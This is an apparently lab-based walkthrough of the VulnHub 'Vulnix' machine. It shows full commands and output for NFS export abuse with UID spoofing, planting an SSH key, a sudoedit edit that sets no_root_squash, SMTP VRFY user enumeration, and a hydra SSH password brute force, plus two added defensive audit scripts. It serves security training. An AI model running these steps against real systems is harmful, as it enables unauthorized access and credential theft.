HackLAB: Vulnix
15 Apr 2019 | Walkthroughs
VulnHub URL: https://www.vulnhub.com/entry/hacklab-vulnix,48/
Hostname: vulnix
IP Address: 10.183.0.191
Information Gathering/Recon
The IP address is obtained via DHCP at boot. In my case, the IP is 10.183.0.191.
Service Enumeration/Scanning
root@kali:~/Walkthroughs/vulnix# nmap -Pn -sT -sV -sC -A -oA vulnix -p 1-65535 10.183.0.191
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-24 23:33 EDT
Nmap scan report for vulnix.homenet.dom (10.183.0.191)
Host is up (0.0029s latency).
Not shown: 65518 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)
| 2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)
|_ 256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_ssl-date: 2019-04-25T03:34:55+00:00; +6s from scanner time.
79/tcp open finger Linux fingerd
|_finger: No one logged on.\x0D
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: CAPA STLS SASL PIPELINING UIDL TOP RESP-CODES
|_ssl-date: 2019-04-25T03:34:55+00:00; +6s from scanner time.
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 48766/udp mountd
| 100005 1,2,3 52406/tcp mountd
| 100021 1,3,4 40343/udp nlockmgr
| 100021 1,3,4 59897/tcp nlockmgr
| 100024 1 39331/tcp status
| 100024 1 52861/udp status
| 100227 2,3 2049/tcp nfs_acl
|_ 100227 2,3 2049/udp nfs_acl
143/tcp open imap Dovecot imapd
|_imap-capabilities: OK IDLE IMAP4rev1 SASL-IR more have post-login LOGIN-REFERRALS capabilities Pre-login listed STARTTLS ID LITERAL+ ENABLE LOGINDISABLEDA0001
|_ssl-date: 2019-04-25T03:34:55+00:00; +6s from scanner time.
512/tcp open exec?
513/tcp open login?
514/tcp open tcpwrapped
993/tcp open ssl/imaps?
|_ssl-date: 2019-04-25T03:34:54+00:00; +6s from scanner time.
995/tcp open ssl/pop3s?
|_ssl-date: 2019-04-25T03:34:54+00:00; +6s from scanner time.
2049/tcp open nfs_acl 2-3 (RPC #100227)
39331/tcp open status 1 (RPC #100024)
46571/tcp open mountd 1-3 (RPC #100005)
51367/tcp open mountd 1-3 (RPC #100005)
52406/tcp open mountd 1-3 (RPC #100005)
59897/tcp open nlockmgr 1-4 (RPC #100021)
MAC Address: 00:0C:29:FC:C6:E7 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
Service Info: Host: vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 5s, deviation: 0s, median: 5s
TRACEROUTE
HOP RTT ADDRESS
1 2.93 ms vulnix.homenet.dom (10.183.0.191)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 233.93 seconds
Gaining Access
Wow! Lots of services to look into. And, unlike most, no web services. The likely "most vulnerable" service we see is NFS/RPC. Let's see what is available using showmount.
root@kali:~/Walkthroughs/vulnix# showmount -e 10.183.0.191
Export list for 10.183.0.191:
/home/vulnix *
Great! We already see a wide open NFS share. Let's mount it and see what's inside (and if root squashing is enabled).
root@kali:~/Walkthroughs/vulnix# mkdir -p nfs/home-vulnix
root@kali:~/Walkthroughs/vulnix# cd nfs
root@kali:~/Walkthroughs/vulnix/nfs# mount -t nfs 10.183.0.191:/home/vulnix home-vulnix
root@kali:~/Walkthroughs/vulnix/nfs# ls -l
total 4
drwxr-x--- 2 nobody 4294967294 4096 Sep 2 2012 home-vulnix
Looks like the permissions for the export aren't going to allow us to just browse through. Let's unmount the export and remount using nfspy.
root@kali:~/Walkthroughs/vulnix/nfs# umount home-vulnix
root@kali:~/Walkthroughs/vulnix/nfs# nfspy -o server=10.183.0.191:/home/vulnix,hide,allow_other,rw,intr home-vulnix
root@kali:~/Walkthroughs/vulnix/nfs# ls -l
total 4
drwxr-x--- 2 2008 2008 4096 Sep 2 2012 home-vulnix
root@kali:~/Walkthroughs/vulnix/nfs# cd home-vulnix/
root@kali:~/Walkthroughs/vulnix/nfs/home-vulnix# ls -a
. .. .bash_logout .bashrc .profile
This time we can browse the export and see the real UID/GID of the directory owner (2008/2008). Based on the home directory name, I'll assume this is the UID/GID of the user vulnix. Let's use the finger service that is available to confirm that the user exists.
root@kali:~/Walkthroughs/vulnix# finger vulnix@10.183.0.191
Login: vulnix Name:
Directory: /home/vulnix Shell: /bin/bash
Never logged in.
No mail.
No Plan.
Sure enough. The next thing to do is to see whether we can drop an SSH public key into the user's home directory and log in as them. Before that, we'll take a quick peek at the hidden files already in the directory. Checking each of them, they don't contain anything of interest.
Let's see if we can create a .ssh directory and authorized_keys file.
root@kali:~/Walkthroughs/vulnix/nfs/home-vulnix# cd .ssh
root@kali:~/Walkthroughs/vulnix/nfs/home-vulnix/.ssh# cp ../../../vulnix.pub authorized_keys
cp: failed to preserve ownership for 'authorized_keys': Operation not permitted
root@kali:~/Walkthroughs/vulnix/nfs/home-vulnix/.ssh# ls -l
total 1
-rw------- 1 2008 2008 391 Apr 25 06:57 authorized_keys
Looking good so far. Let's try to SSH to the server as vulnix.
root@kali:~/Walkthroughs/vulnix# ssh -i vulnix vulnix@10.183.0.191
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)
* Documentation: https://help.ubuntu.com/
System information as of Thu Apr 25 12:00:11 BST 2019
System load: 0.0 Processes: 93
Usage of /: 90.2% of 773MB Users logged in: 0
Memory usage: 7% IP address for eth0: 10.183.0.191
Swap usage: 0%
=> / is using 90.2% of 773MB
Graph this data and manage this system at https://landscape.canonical.com/
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
vulnix@vulnix:~$
We are in! 😄
Maintaining Access
Since we have SSH access, I skipped this step.
Privilege Escalation
Checking the kernel version using uname -a. There aren't any known exploits for this version of the kernel.
vulnix@vulnix:~$ uname -a
Linux vulnix 3.2.0-29-generic-pae #46-Ubuntu SMP Fri Jul 27 17:25:43 UTC 2012 i686 i686 i386 GNU/Linux
The NFS export has root_squash enabled, so we won't be able to escalate using the NFS share.
vulnix@vulnix:~$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix *(rw,root_squash)
Or can we? Checking sudo permissions, it looks like we can edit /etc/exports using sudoedit.
vulnix@vulnix:~$ sudo -l
Matching 'Defaults' entries for vulnix on this host:
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User vulnix may run the following commands on this host:
(root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports
The problem is how to get the NFS server to pick up the change after we edit the file. You have to be root to restart services or reboot... or do you? According to this article, you can set the following values and force a hard reboot.
Guess we can try it...
But first, we'll edit the exports file to turn off root squashing.
Because I'm working in 'screen', I had to make some terminal adjustments to get sudoedit to work. Also, the default editor was nano, so I changed it to vim.
vulnix@vulnix:~$ export TERM=xterm
vulnix@vulnix:~$ export SUDO_EDITOR=/usr/bin/vim
vulnix@vulnix:~$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix *(rw,no_root_squash)
Now, for the "magic" commands...
vulnix@vulnix:~$ echo 1 > /proc/sys/kernel/sysrq
-bash: /proc/sys/kernel/sysrq: Permission denied
vulnix@vulnix:~$ echo b > /proc/sysrq-trigger
-bash: /proc/sysrq-trigger: Permission denied
So much for that.
Since having to reboot the box seems lame to me, I'm going to stop here. If you want to escalate after a reboot, just follow the steps in hackfest2016 : Orcus.
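The export audit that the NFS steps above imply, as an added example that is not part of the walkthrough: a small Python checker for /etc/exports that flags the conditions used against this box (a wildcard client, a writable export, and the fact that root_squash remaps only UID 0, which is why presenting UID 2008 through nfspy worked). The /srv/data line in the sample is a constructed, hardened comparison, not something on the box.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample: the export as found on the box, the version the
# walkthrough rewrote it to, and a hardened line (an assumption, not on the page).
SAMPLE_EXPORTS = """\
# /etc/exports: the access control list for filesystems which may be exported
/home/vulnix *(rw,root_squash)
/home/vulnix *(rw,no_root_squash)
/srv/data 10.183.0.0/24(rw,sync,root_squash,all_squash)
"""

# exports(5) client syntax: host or network, optionally followed by (opt,opt,...)
CLIENT_RE = re.compile(r"^(?P<host>[^(\s]+)(?:\((?P<opts>[^)]*)\))?$")

def parse_exports(text: str) -> List[Dict]:
    """Split exports(5) lines into one record per (path, client) pair."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        path, *clients = line.split()
        for client in clients:
            m = CLIENT_RE.match(client)
            if not m:
                continue
            opts = set(filter(None, (m.group("opts") or "").split(",")))
            entries.append({"path": path, "host": m.group("host"), "options": opts})
    return entries

def audit_export(entry: Dict) -> List[str]:
    """Findings for one export, in the order they mattered on this box."""
    findings = []
    host, opts = entry["host"], entry["options"]
    if host == "*" or host.startswith("*."):
        findings.append("wildcard-client")  # anyone reaching port 2049 may mount
    if "rw" in opts:
        findings.append("writable")
    if "no_root_squash" in opts:
        findings.append("no_root_squash")  # remote root keeps UID 0
    # root_squash remaps only UID 0; any other UID the client asserts (2008 via
    # nfspy above) is trusted unless all_squash or Kerberos (sec=krb5*) is set.
    if "all_squash" not in opts and not any(o.startswith("sec=krb5") for o in opts):
        findings.append("client-uid-trusted")
    return findings

def audit_exports(text: str) -> List[Tuple[str, str, List[str]]]:
    """(path, client, findings) for every export in the file."""
    return [(e["path"], e["host"], audit_export(e)) for e in parse_exports(text)]
```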
Pivoting
N/A
Clean Up
Additional Info
SMTP VRFY
The SMTP service supports the VRFY command, so we can try to enumerate valid accounts by running smtp-user-enum.
root@kali:~/Walkthroughs/vulnix# smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/Honeypot-Captures/multiplesources-users-fabian-fingerle.de.txt -t 10.183.0.191 -m 15
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 15
Usernames file ........... /usr/share/seclists/Usernames/Honeypot-Captures/multiplesources-users-fabian-fingerle.de.txt
Target count ............. 1
Username count ........... 21169
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Thu Apr 25 00:57:06 2019 #########
10.183.0.191: backup exists
10.183.0.191: BACKUP exists
10.183.0.191: BIN exists
10.183.0.191: bin exists
10.183.0.191: daemon exists
10.183.0.191: DAEMON exists
10.183.0.191: dovecot exists
10.183.0.191: dovenull exists
10.183.0.191: games exists
10.183.0.191: GAMES exists
10.183.0.191: gnats exists
10.183.0.191: irc exists
10.183.0.191: landscape exists
10.183.0.191: libuuid exists
10.183.0.191: list exists
10.183.0.191: lp exists
10.183.0.191: MAIL exists
10.183.0.191: mail exists
10.183.0.191: man exists
10.183.0.191: messagebus exists
10.183.0.191: news exists
10.183.0.191: NOBODY exists
10.183.0.191: nobody exists
10.183.0.191: postfix exists
10.183.0.191: POSTFIX exists
10.183.0.191: postmaster exists
10.183.0.191: PROXY exists
10.183.0.191: proxy exists
10.183.0.191: ROOT exists
10.183.0.191: root exists
10.183.0.191: sshd exists
10.183.0.191: SSHD exists
10.183.0.191: statd exists
10.183.0.191: SYNC exists
10.183.0.191: sync exists
10.183.0.191: sys exists
10.183.0.191: syslog exists
10.183.0.191: user exists
10.183.0.191: User exists
10.183.0.191: USER exists
10.183.0.191: uucp exists
10.183.0.191: UUCP exists
10.183.0.191: whoopsie exists
10.183.0.191: www-data exists
######## Scan completed at Thu Apr 25 00:58:01 2019 #########
44 results.
21169 queries in 55 seconds (384.9 queries / sec)
This produced the following list of unique users:
- backup
- bin
- daemon
- dovecot
- dovenull
- games
- gnats
- irc
- landscape
- libuuid
- list
- lp
- mail
- man
- messagebus
- news
- nobody
- postfix
- postmaster
- proxy
- root
- sshd
- statd
- sync
- sys
- syslog
- user
- uucp
- whoopsie
- www-data
Obviously the 'whoopsie' account stands out (along with some others).
Let's use the finger service to try to get information about each of these user accounts. We'll write a script to finger each user account and redirect the output to a file.
root@kali:~/Walkthroughs/vulnix# cat finger-all
#!/bin/bash
finger backup@10.183.0.191
finger bin@10.183.0.191
finger daemon@10.183.0.191
finger dovecot@10.183.0.191
finger dovenull@10.183.0.191
finger games@10.183.0.191
finger gnats@10.183.0.191
finger irc@10.183.0.191
finger landscape@10.183.0.191
finger libuuid@10.183.0.191
finger list@10.183.0.191
finger lp@10.183.0.191
finger mail@10.183.0.191
finger man@10.183.0.191
finger messagebus@10.183.0.191
finger news@10.183.0.191
finger nobody@10.183.0.191
finger postfix@10.183.0.191
finger postmaster@10.183.0.191
finger proxy@10.183.0.191
finger root@10.183.0.191
finger sshd@10.183.0.191
finger statd@10.183.0.191
finger sync@10.183.0.191
finger sys@10.183.0.191
finger syslog@10.183.0.191
finger user@10.183.0.191
finger uucp@10.183.0.191
finger whoopsie@10.183.0.191
finger www-data@10.183.0.191
root@kali:~/Walkthroughs/vulnix# chmod +x finger-all
root@kali:~/Walkthroughs/vulnix# ./finger-all > finger-all-results.txt
root@kali:~/Walkthroughs/vulnix# finger vulnix@10.183.0.191 >> finger-all-results.txt
Since we saw /home/vulnix exported through NFS, we fingered the vulnix user as well and appended the result to the file. The most useful information we gleaned from finger was which users have a login shell defined; this tells us which accounts are worth trying to brute force over SSH. That list includes:
- backup
- bin
- daemon
- games
- gnats
- irc
- libuuid
- list
- lp
- mail
- man
- news
- nobody
- proxy
- root
- sys
- user
- uucp
- vulnix
- www-data
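A parser for the two outputs above, added here and not part of the original post: it collapses the smtp-user-enum case variants to unique accounts and pulls the Shell field out of finger output, so the accounts that still have an interactive shell can be reviewed (and locked down) explicitly rather than by eye. The sample inputs are constructed in the formats shown above, and the set of non-login shells is an assumption.

```python
import re
from typing import Dict, List

# Constructed sample of smtp-user-enum VRFY hits, in the format printed above.
ENUM_OUTPUT = """\
10.183.0.191: ROOT exists
10.183.0.191: root exists
10.183.0.191: sshd exists
10.183.0.191: user exists
10.183.0.191: User exists
"""

# Constructed sample of finger output, in the layout fingerd printed above.
FINGER_OUTPUT = """\
Login: root                             Name: root
Directory: /root                        Shell: /bin/bash
Never logged in.
No mail.
No Plan.
Login: sshd                             Name:
Directory: /var/run/sshd                Shell: /usr/sbin/nologin
Login: vulnix                           Name:
Directory: /home/vulnix                 Shell: /bin/bash
"""

# Shells that cannot start a session (assumed list; extend per distribution).
NON_LOGIN_SHELLS = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin", "/bin/sync", ""}

def unique_users(enum_output: str) -> List[str]:
    """One entry per account: the server answered ROOT and root alike above."""
    hits = re.findall(r"^\S+:\s+(\S+)\s+exists$", enum_output, re.M)
    return sorted({h.lower() for h in hits})

def finger_shells(finger_output: str) -> Dict[str, str]:
    """Map each login reported by fingerd to its Shell field."""
    shells, login = {}, None
    for line in finger_output.splitlines():
        m = re.match(r"Login:\s+(\S+)", line)
        if m:
            login = m.group(1)
            continue
        m = re.search(r"Shell:\s*(\S*)\s*$", line)
        if m and login:
            shells[login] = m.group(1)
    return shells

def interactive_accounts(shells: Dict[str, str]) -> List[str]:
    """Accounts with a real login shell: the ones to lock down or rate-limit first."""
    return sorted(u for u, s in shells.items() if s not in NON_LOGIN_SHELLS)
```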
We are going to pull together a handful of wordlists and create a "master" list to use to try to crack some passwords. We'll use hydra to try to brute force the SSH service.
root@kali:~/Walkthroughs/vulnix# cat /usr/share/seclists/Passwords/probable-v2-top207.txt \
> /usr/share/seclists/Passwords/darkweb2017-top1000.txt \
> /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt \
> /usr/share/seclists/Passwords/Common-Credentials/best1050.txt \
> /usr/share/seclists/Passwords/Common-Credentials/common-passwords-win.txt \
> /usr/share/seclists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt | sort -u > wordlist.txt
Before using a wordlist, though, we'll check whether any users have a simple variation of their username as their password. Maybe we'll get lucky.
root@kali:~/Walkthroughs/vulnix# hydra -o ssh-crack -t 4 -L ssh-users -u -e nsr ssh://10.183.0.191
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-04-25 01:26:55
[DATA] max 4 tasks per 1 server, overall 4 tasks, 60 login tries (l:20/p:3), ~15 tries per task
[DATA] attacking ssh://10.183.0.191:22/
1 of 1 target completed, 0 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-04-25 01:27:15
Nope! Time to use the wordlist. We'll start with a simple one.
root@kali:~/Walkthroughs/vulnix# hydra -o ssh-crack -t 4 -L ssh-users -u -e nsr -P /usr/share/seclists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt ssh://10.183.0.191
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-04-25 06:44:23
[DATA] max 4 tasks per 1 server, overall 4 tasks, 480 login tries (l:20/p:24), ~120 tries per task
[DATA] attacking ssh://10.183.0.191:22/
[STATUS] 141.00 tries/min, 141 tries in 00:01h, 339 to do in 00:03h, 4 active
[STATUS] 126.00 tries/min, 378 tries in 00:03h, 102 to do in 00:01h, 4 active
[22][ssh] host: 10.183.0.191 login: user password: letmein
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-04-25 06:48:20
Looks like we found an account with a weak password.